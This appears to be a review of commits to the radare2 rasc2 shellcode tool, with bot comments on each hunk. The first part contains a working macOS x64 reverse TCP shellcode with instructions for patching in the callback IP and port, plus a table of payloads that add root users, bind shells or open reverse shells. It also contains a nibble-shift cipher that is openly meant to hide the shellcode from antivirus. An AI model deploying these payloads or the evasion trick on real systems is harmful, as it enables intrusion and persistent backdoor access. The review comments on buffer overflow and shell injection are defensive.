/* OSX reverse tcp shell (131 bytes)
* replace FFFFFFFF around byte 43 with the call back ip in hex
* replace 5C11 around byte 39 with a new port current is 4444
* http://hammackj.com/2011/04/28/osx-x64-reverse-tcp-shellcode/
*/
char x64_osx_reverse_tcp[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x61\x4c\x89\xc0\x48"
"\x31\xd2\x48\x89\xd6\x48\xff\xc6\x48\x89\xf7\x48\xff\xc7\x0f"
"\x05\x49\x89\xc4\x49\xbd\x01\x01\x11\x5c\xff\xff\xff\xff\x41"
"\xb1\xff\x4d\x29\xcd\x41\x55\x49\x89\xe5\x49\xff\xc0\x4c\x89"
"\xc0\x4c\x89\xe7\x4c\x89\xee\x48\x83\xc2\x10\x0f\x05\x49\x83"
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83"
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48"
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed"
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05";
#define ENTRY(a,b,c,x,y,z) { .name=x, .desc=z, .data=(unsigned char *)&y, .len=sizeof(y)-1, \
.cmd=a, .host=b, .port=c },
#define ENTRY_NULL() { NULL, NULL, NULL, 0 }
struct shellcode_t shellcodes[] = {
ENTRY(0,0,0,"arm.linux.adduser", arm_linux_adduser, "Adds root user 'shell-storm' with password 'toor'" )
ENTRY(0,0,0,"arm.linux.binsh", arm_linux_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.thumb", arm_linux_thumb, "Runs /bin/sh using thumb mode trick" )
ENTRY(0,0,0,"arm.linux.suidsh", arm_linux_suidsh, "Setuid and runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.bind", arm_linux_bind, "Binds /bin/sh to a tcp port" )
ENTRY(0,0,30,"armle.osx.reverse", armle_osx_reverse, "iPhone reverse connect shell to HOST and PORT" )
ENTRY(0,0,0,"dual.linux.binsh", x86_ppc_linux_binsh, "x86/ppc MacOSX /bin/sh shellcode" )
ENTRY(0,0,0,"dual.osx.binsh", x86_ppc_osx_binsh, "Runs /bin/sh (works also on x86) (dual)" )
ENTRY(0,0,0,"mips.linux.binsh", mips_linux_binsh, "Runs /bin/sh (tested on loongson2f)." )
ENTRY(0,0,0,"ppc.osx.adduser", ppc_osx_adduser, "Adds a root user named 'r00t' with no pass." )
ENTRY(0,0,0,"ppc.osx.binsh", ppc_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"ppc.osx.binsh0", ppc_osx_binsh0, "Executes /bin/sh (with zeroes)" )
ENTRY(0,0,0,"ppc.osx.bind4444", ppc_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"ppc.osx.reboot", ppc_osx_reboot, "Reboots the box" )
ENTRY(0,0,0,"ppc.bsd.binsh", ppc_bsd_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"sparc.linux.binsh", sparc_linux_binsh, "Runs /bin/sh on sparc/linux" )
ENTRY(0,0,0,"sparc.linux.bind4444", sparc_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"sparc.linux.binsh2", sparc_linux_javicoder_binsh, "Runs /bin/sh on sparc/linux (coder)" )
ENTRY(0,0,0,"sparc.linux.bind1124", sparc_linux_javicoder_portbind, "Listen shell at 1124" )
ENTRY(0,0,0,"sparc.linux.connect", sparc_linux_javicoder_connect, "Connects to 10.12.34.3 : 1124")
//ENTRY(0,0,0,"ia64.linux.binsh", ia64_linux_binsh, "Executes /bin/sh on Intel Itanium" )
ENTRY(0,0,0,"x64.linux.binsh", x64_linux_binsh, "Runs /bin/sh on 64 bits" )
ENTRY(0,0,0,"x64.osx.suidsh", x64_osx_suidsh, "Setuid(0) and runs /bin/sh")
ENTRY(0,43,39,"x64.osx.reverse", x64_osx_reverse_tcp, "OSX reverse connect shell")
ENTRY(0,0,0,"x86.bsd.binsh", x86_bsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.binsh2", x86_bsd_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.suidsh", x86_bsd_suidsh, "Setuid(0) and runs /bin/sh" )
ENTRY(0,0,0,"x86.bsd.bind4444", x86_bsd_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.bsdlinux.binsh", x86_bsdlinux_binsh, "Dual linux/bsd shellcode runs /bin/sh" )
ENTRY(0,0,0,"x86.freebsd.reboot", x86_freebsd_reboot, "Reboots target box" )
ENTRY(0,0,0,"x86.freebsd.reverse", x86_freebsd_reverse, "Reboots target box" )
ENTRY(0,0,0,"x86.linux.adduser", x86_linux_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.linux.bind4444", x86_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"x86.linux.binsh", x86_linux_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh1", x86_linux_binsh1, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh2", x86_linux_binsh2, "Executes /bin/sh" )
ENTRY(43,0,0,"x86.linux.binsh3", x86_linux_binsh3, "Executes /bin/sh or CMD" )
ENTRY(0,0,0,"x86.linux.udp4444", x86_linux_udp4444, "Binds a shell at UDP port 4444" )
ENTRY(0,0,0,"x86.netbsd.binsh", x86_netbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.binsh", x86_openbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.bind6969", x86_openbsd_bind6969, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh", x86_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh2", x86_osx_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.bind4444", x86_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.solaris.binsh", x86_solaris_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"x86.solaris.binshu", x86_solaris_binshu, "Runs /bin/sh (toupper() safe)" )
ENTRY(0,0,0,"x86.solaris.bind4444", x86_solaris_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.msg", x86_w32_msg, "Shows a MessageBox" )
ENTRY(0,0,0,"x86.w32.cmd", x86_w32_cmd_exit, "Runs cmd.exe and ExitThread" )
ENTRY(0,0,0,"x86.w32.adduser", x86_w32_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.w32.bind4444", x86_w32_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.tcp4444", x86_w32_tcp4444, "Binds a shell at port 4444" )
ENTRY_NULL()
};
#if 0
main()
{
void (*punk)() = &x86_linux_binsh;
punk();
printf("%s\n", shellcodes[0].desc);
}
#endif

64
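--- /dev/null
+++ b/binr/rasc2/xorhex.c
@@ -0,0 +1,64 @@
+/* stupid source file cipher -- pancake */
+/* this is necessary in order to avoid antiviruses detect shellcodes are malware */
+#include <stdio.h>
+#include <string.h>
+static int unshift = 0;
+static char shiftchar (char c) {
+if (c>='0'&&c<='9') c=c-'0';
+else if (c>='a'&&c<='f') c=c-'a'+10;
+else if (c>='A'&&c<='F') c=c-'A'+10;
+else return c;
+if (unshift) c = (c==0xf)?0:c+1;
+else c = c?c-1:0xf;
+//if (unshift) c = ((c<<1)&0xf) | ((c&0x80)>>7);
+//else c = (c>>1) | ((c&1)<<7);
+return (c<=9)? c+'0': (c-10)+'a';
+}
+static int ishexa(char c) {
+if (c>='0'&&c<='9') return 1;
+if (c>='a'&&c<='f') return 1;
+if (c>='A'&&c<='F') return 1;
+return 0;
+}
+static void parsestr (char *b) {
+char o = 0;
+for (b++; *b; b++) {
+if (o=='\\' && *b=='x')
+for (b++; *b && ishexa (*b); b++)
+*b = shiftchar (*b);
+o = *b;
+}
+}
+static void parseint (char *b) {
+char o = 0;
+for (b++; *b; b++) {
+if (o=='0' && *b=='x')
+for (b++; *b && ishexa (*b); b++)
+*b = shiftchar (*b);
+o = *b;
+}
+}
+int main(int argc, char **argv) {
+char buf[2048];
+unshift = argc-1;
+for (;;) {
+fgets (buf, sizeof (buf), stdin);
+if (feof (stdin))
+return 0;
+if (buf[0]=='\t') {
+if (!memcmp (buf+1, "\"\\x", 3))
+parsestr (buf);
+else
+if (!memcmp (buf+1, "0x", 2))
+parseint (buf);
+}
+printf ("%s", buf);
+}
+}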
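Review bot: The read loop in main drops a final line that has no trailing newline and spins forever on a read error, because the return value of fgets() is ignored and only feof() is consulted: fgets() reads the unterminated last line and sets the EOF flag, the feof() test then returns before that line is printed, and on a stream error neither condition fires so the stale buffer is printed again and again. Replace the fgets/feof pair with `if (!fgets (buf, sizeof (buf), stdin)) return 0;`. The inner loops of parsestr and parseint can also stop with `*b` on the terminating NUL (a run of hex digits that reaches the end of a truncated 2047-byte line), after which the outer `b++` steps past the end of the string; advance only while `ishexa (b[1])` instead of consuming the stopping character. Note too that the nibble shift is obfuscation, not encryption — the fixed inverse transform ships in test.c as cipher_memcpy — so the header comment should call it an AV-signature workaround rather than a cipher, e.g. `/* reversible nibble shift to break AV signatures; provides no confidentiality */`.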


@ -28,8 +28,9 @@ lang_python.${EXT_SO}:
-L${HOME}/.wine/drive_c/Python27/libs -L../../core/ -lr_core \
${LDFLAGS_LIB} -shared -o lang_python.${EXT_SO} python.c -lpython27
else
PYCFLAGS=$(shell ./pycfg --cflags)
PYLDFLAGS=$(shell ./pycfg --libs)
PYCFG=../../../swig/python-config-wrapper
PYCFLAGS=$(shell ${PYCFG} --cflags)
PYLDFLAGS=$(shell ${PYCFG} --libs)
lang_python.${EXT_SO}:
${CC} ${CFLAGS} ${PYCFLAGS} ${PYLDFLAGS} \
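Review bot: `PYCFLAGS=$(shell ${PYCFG} --cflags)` and the `PYLDFLAGS` line use recursive assignment, so the wrapper script is re-run every time either variable is expanded; `PYCFLAGS:=$(shell ${PYCFG} --cflags)` and `PYLDFLAGS:=$(shell ${PYCFG} --libs)` evaluate it once. The wrapper is reached through a relative path three levels up, so a build of this plugin outside the full tree ends up with empty flags and make only reports the missing script on stderr; a comment such as `# shared with swig/, requires the full source tree` would make that dependency explicit. The `else` branch this sits in opens and closes outside the hunk.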


@ -1,7 +0,0 @@
#!/bin/sh
PYTHONS="python python2 python2.5 python2.6 python2.7 python2.8 python3"
for a in ${PYTHONS} ; do
$a-config $@ | sed -e 's/-arch [^\s]*//g' | sed s,-Wstrict-prototypes,,g
[ $? = 0 ] && exit 0
done
exit 1


@ -9,7 +9,7 @@
static int r_vala_file(RLang *lang, const char *file) {
void *lib;
char *p, name[512], buf[512];
char *p, *vapidir, name[512], buf[512];
if (!strstr (file, ".vala"))
sprintf (name, "%s.vala", file);
@ -19,7 +19,11 @@ static int r_vala_file(RLang *lang, const char *file) {
return R_FALSE;
}
sprintf (buf, "valac --pkg r_core -C %s", name);
vapidir = r_sys_getenv ("VAPIDIR");
if (vapidir && *vapidir)
sprintf (buf, "valac --vapidir=%s --pkg r_core -C %s",
vapidir, name);
else sprintf (buf, "valac --pkg r_core -C %s", name);
if (system (buf) != 0)
return R_FALSE;
p = strstr (name, ".vala"); if (p) *p=0;
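Review bot: The new `sprintf (buf, "valac --vapidir=%s --pkg r_core -C %s", vapidir, name)` writes an environment-controlled string of unbounded length into `buf[512]`, and `name` can itself be close to 512 bytes, so a long VAPIDIR overflows the stack buffer before the command is even run; use `snprintf (buf, sizeof (buf), ...)` in both branches and `return R_FALSE` when the result is truncated. The string is then handed to `system()`, so shell metacharacters in VAPIDIR or in the file name are interpreted by the shell — acceptable only if both come from a trusted user, which deserves a comment at the `system (buf)` line. `r_sys_getenv` presumably returns an allocated copy (verify against its definition); if so, `vapidir` is never freed here. r_vala_file continues past the end of the hunk.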


@ -3,7 +3,8 @@
# -- pancake
# order matters here
PCS=" python2-config
PCS=" python-config
python2-config
python25-config
python2.5-config
python26-config
@ -29,4 +30,4 @@ if [ "$1" = "-n" ]; then
exit 0
fi
${PYTHONCONFIG} $@ | sed -e s,-Wstrict-prototypes,,g 2>/dev/null
${PYTHONCONFIG} $@ | sed -e 's/-arch [^\s]*//g' | sed s,-Wstrict-prototypes,,g 2>/dev/null
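Review bot: The added `sed -e 's/-arch [^\s]*//g'` does not do what it intends: inside a POSIX bracket expression `\s` is not a whitespace class, so `[^\s]` matches any character except backslash and `s`, and the pattern can eat past the architecture name into following flags (from `-arch x86_64 -isysroot ...` it removes `-arch x86_64 -i` and leaves `sysroot`). Use `'s/-arch [^ ]*//g'` instead. `$@` is unquoted and should be `"$@"` so arguments containing spaces reach `${PYTHONCONFIG}` intact, and the trailing `2>/dev/null` only silences the last sed, not the config script itself. The same expression existed in the deleted pycfg script, so this is an inherited defect rather than a new one.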